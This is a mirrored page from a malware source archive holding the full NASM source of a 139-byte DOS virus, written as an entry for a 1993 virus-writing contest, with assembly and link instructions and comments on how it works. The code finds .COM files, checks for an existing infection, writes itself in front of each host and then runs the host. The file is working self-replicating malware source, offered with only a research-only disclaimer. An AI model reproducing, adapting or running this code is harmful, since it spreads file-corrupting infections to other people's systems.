mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-26 03:55:06 +00:00
153 lines
7.2 KiB
NASM
153 lines
7.2 KiB
NASM
|
;A small (139 byte) virus with minimal required functionality.
|
|||
|
|
|||
|
;This Virus for research purposes only. Please do not release!
|
|||
|
;Please execute it only on a carefully controlled system, and only
|
|||
|
;if you know what you're doing!
|
|||
|
|
|||
|
;An example for
|
|||
|
|
|||
|
;#######################################################
|
|||
|
;# THE FIRST INTERNATIONAL VIRUS WRITING CONTEST #
|
|||
|
;# 1 9 9 3 #
|
|||
|
;# sponsored by #
|
|||
|
;# American Eagle Publications, Inc. #
|
|||
|
;#######################################################
|
|||
|
|
|||
|
;Assemble this file with TASM 2.0 or higher: "TASM LITTLE;"
|
|||
|
;Link as "TLINK /T LITTLE;"
|
|||
|
|
|||
|
;Basic explanation of how this virus works:
|
|||
|
;
|
|||
|
;The virus takes control when the program first starts up. All of its code is
|
|||
|
;originally located at the start of a COM file that has been infected. When
|
|||
|
;the virus starts, it takes over a segment 64K above the one where the program
|
|||
|
;was loaded by DOS. It copies itself up there, and then searches for an
|
|||
|
;uninfected file. To determine if a file is infected, it checks the first two
|
|||
|
;bytes to see if they are the same as its first two bytes. It reads the file
|
|||
|
;into memory right above where it is sitting (at 100H in the upper segment).
|
|||
|
;If not already infected, it just writes itself plus the file it infected back
|
|||
|
;out to disk under the same file name. Then it moves the host in the lower
|
|||
|
;segment back to offset 100H and executes it.
|
|||
|
|
|||
|
|
|||
|
.model tiny ;Tiny model to create a COM file
|
|||
|
|
|||
|
.code
|
|||
|
|
|||
|
;DTA definitions
|
|||
|
DTA EQU 0000H ;Disk transfer area
|
|||
|
FSIZE EQU DTA+1AH ;file size location in file search
|
|||
|
FNAME EQU DTA+1EH ;file name location in file search
|
|||
|
|
|||
|
|
|||
|
ORG 100H
|
|||
|
|
|||
|
;******************************************************************************
|
|||
|
;The virus starts here.
|
|||
|
|
|||
|
VIRSTART:
|
|||
|
mov ax,ds
|
|||
|
add ax,1000H
|
|||
|
mov es,ax ;upper segment is this one + 1000H
|
|||
|
mov si,100H ;put virus in the upper segment
|
|||
|
mov di,si ;at offset 100H
|
|||
|
; mov cl,BYTE (OFFSET HOST AND 0FFH) ;can't code this with TASM
|
|||
|
mov cl,8BH ;we can assume ch=0
|
|||
|
rep movsb ;this will louse the infection up if run under debug!
|
|||
|
mov ds,ax ;set ds to high segment
|
|||
|
push ds
|
|||
|
mov ax,OFFSET FIND_FILE
|
|||
|
push ax
|
|||
|
retf ;jump to high memory segment
|
|||
|
|
|||
|
;Now it's time to find a viable file to infect. We will look for any COM file
|
|||
|
;and see if the virus is there already.
|
|||
|
FIND_FILE:
|
|||
|
xor dx,dx ;move dta to high segment
|
|||
|
mov ah,1AH ;so we don't trash the command line
|
|||
|
int 21H ;which the host is expecting
|
|||
|
mov dx,OFFSET COMFILE
|
|||
|
mov ch,3FH ;search for any file, no matter what attribute (note: cx=0 before this instr)
|
|||
|
mov ah,4EH ;DOS search first function
|
|||
|
int 21H
|
|||
|
CHECK_FILE: jc ALLDONE ;no COM files to infect
|
|||
|
|
|||
|
mov dx,FNAME ;first open the file
|
|||
|
mov ax,3D02H ;r/w access open file, since we'll want to write to it
|
|||
|
int 21H
|
|||
|
jc NEXT_FILE ;error opening file - quit and say this file can't be used
|
|||
|
mov bx,ax ;put file handle in bx, and leave it there for the duration
|
|||
|
|
|||
|
mov di,FSIZE
|
|||
|
mov cx,[di] ;get file size for reading into buffer
|
|||
|
mov dx,si ;and read file in at HOST in new segment (note si=OFFSET HOST)
|
|||
|
mov ah,3FH ;DOS read function
|
|||
|
int 21H
|
|||
|
mov ax,[si] ;si=OFFSET HOST here
|
|||
|
jc NEXT_FILE ;skip file if error reading it
|
|||
|
|
|||
|
cmp ax,WORD PTR [VIRSTART] ;see if infected already
|
|||
|
jnz INFECT_FILE ;nope, go do it
|
|||
|
|
|||
|
mov ah,3EH ;else close the file
|
|||
|
int 21H ;and fall through to search for another file
|
|||
|
|
|||
|
NEXT_FILE: mov ah,4FH ;look for another file
|
|||
|
int 21H
|
|||
|
jmp SHORT CHECK_FILE ;and go check it out
|
|||
|
|
|||
|
COMFILE DB '*.COM',0
|
|||
|
|
|||
|
;When we get here, we've opened a file successfully, and read it into memory.
|
|||
|
;In the high segment, the file is set up exactly as it will look when infected.
|
|||
|
;Thus, to infect, we just rewrite the file from the start, using the image
|
|||
|
;in the high segment.
|
|||
|
INFECT_FILE:
|
|||
|
xor cx,cx
|
|||
|
mov dx,cx ;reset file pointer to start of file
|
|||
|
mov ax,4200H
|
|||
|
int 21H
|
|||
|
|
|||
|
mov ah,40H
|
|||
|
mov dx,100H
|
|||
|
mov cx,WORD PTR [di] ;adjust size of file for infection
|
|||
|
add cx,OFFSET HOST - 100H
|
|||
|
int 21H ;write infected file
|
|||
|
|
|||
|
mov ah,3EH ;close the file
|
|||
|
int 21H
|
|||
|
|
|||
|
;The infection process is now complete. This routine moves the host program
|
|||
|
;down so that its code starts at offset 100H, and then transfers control to it.
|
|||
|
ALLDONE:
|
|||
|
mov ax,ss ;set ds, es to low segment again
|
|||
|
mov ds,ax
|
|||
|
mov es,ax
|
|||
|
push ax ;prep for retf to host
|
|||
|
shr dx,1 ;restore dta to original value
|
|||
|
mov ah,1AH ;for compatibility
|
|||
|
int 21H
|
|||
|
mov di,100H ;prep to move host back to original location
|
|||
|
push di
|
|||
|
; mov cx,sp ;move code, but don't trash the stack
|
|||
|
; sub cx,si
|
|||
|
mov cx,0FE6FH ;hand code the above to save a byte
|
|||
|
rep movsb ;move code
|
|||
|
retf ;and return to host
|
|||
|
|
|||
|
;******************************************************************************
|
|||
|
;The host program starts here. This one is a dummy that just returns control
|
|||
|
;to DOS.
|
|||
|
|
|||
|
HOST:
|
|||
|
mov ax,4C00H ;Terminate, error code = 0
|
|||
|
int 21H
|
|||
|
|
|||
|
HOST_END:
|
|||
|
|
|||
|
END VIRSTART
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|